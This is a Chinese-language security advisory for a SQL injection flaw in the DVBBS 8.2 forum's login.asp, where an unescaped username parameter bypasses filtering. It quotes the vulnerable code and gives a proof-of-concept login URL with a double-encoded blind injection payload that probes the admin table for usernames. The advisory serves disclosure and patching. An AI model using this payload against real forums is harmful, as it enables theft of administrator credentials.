添加时间:
2008-10-04

系统编号:
WAVDB-01177
BUGTRAQ: 29429

影响版本:
DVBBS 8.2

程序介绍:

动网论坛做为动网主要服务产品之一，自2001年投入推广并运营以来，得到了国内外广大互联网用户的广泛好评和支持。做为国内第一的互联网论坛服务品牌，占据了国内论坛服务市场的70％以上的用户，动网论坛服务在一些如电影、下载、网游等热门网站的占有率甚至高达80％以上，是中国论坛服务领域事实上的标准。

漏洞分析:

DvBBS的login.asp页面没有正确地验证用户所提交的登录请求，远程攻击者可以通过提交带有特制username参数的恶意登录请求执行SQL注入攻击，判断有效的用户名和密码HASH。以下是有漏洞的代码段：

username=trim(Dvbbs.CheckStr(request("username")))
If ajaxPro Then username = unescape(username)

漏洞利用:

http:///www.example.com/?password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25

解决方案:
厂商补丁：
动网论坛
--------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：
http://www.dvbbs.net/

信息来源:
<*来源：hackerb （hackerb@hotmail.com）
链接：http://marc.info/?l=bugtraq&m=121207760013300&w=2
http://www.80sec.com/dvbbs82-sql-injection.html
http://secunia.com/advisories/30455/
*>